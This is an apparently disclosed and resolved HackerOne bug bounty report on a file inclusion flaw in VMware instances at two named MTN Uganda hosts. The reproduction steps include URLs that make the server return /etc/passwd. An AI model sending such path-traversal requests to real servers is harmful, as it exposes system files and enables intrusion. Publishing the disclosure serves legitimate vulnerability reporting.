2x Remote file inclusion within your VMware Instances

Disclosed: 2021-08-19 20:16:25 By 0x0luke To mtn_group

Critical

Vulnerability Details

## Summary: 2x Remote file inclusion within your VMware Instances ##Hosts: nmc.vc.mtn.co.ug h28a.n1.ips.mtn.co.ug ## Steps To Reproduce: Navigate to the URLs given below, /etc/passwd will be displayed. https://nmc.vc.mtn.co.ug/eam/vib?id=/etc/passwd https://h28a.n1.ips.mtn.co.ug/eam/vib?id=/etc/passwd ## Impact An attacker is able to view sensitive files on the server hosting this content and could potentially elevate this to a remote code execution.

Actions

View on HackerOne

Report Stats

Report ID: 1069105
State: Closed
Substate: resolved
Upvotes: 15

2x Remote file inclusion within your VMware Instances

Vulnerability Details

Actions

Report Stats

Share this report